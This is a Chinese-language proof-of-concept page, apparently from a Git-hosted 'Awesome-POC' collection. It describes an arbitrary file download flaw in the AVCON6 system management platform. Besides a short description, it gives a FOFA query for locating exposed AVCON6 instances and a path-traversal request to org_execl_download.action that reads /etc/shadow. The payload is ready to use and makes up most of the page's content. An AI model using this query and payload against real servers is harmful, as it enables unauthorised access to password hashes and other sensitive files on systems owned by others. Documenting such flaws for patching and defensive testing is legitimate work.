Awesome-POC/Web应用漏洞/AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞.md
2022-12-05 11:09:28 +08:00

31 lines
535 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
## 漏洞描述
AVCON6 系统管理平台 org_execl_download.action存在任意文件下载漏洞攻击者通过漏洞可以下载服务器任意文件
## 漏洞影响
```
AVCON6 系统管理平台
```
## FOFA
```
app="AVCON-6"
```
## 漏洞复现
登录页面
![img](./images/202202101910822.png)
验证POC
```php
/org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow
```
![img](./images/202202101910818.png)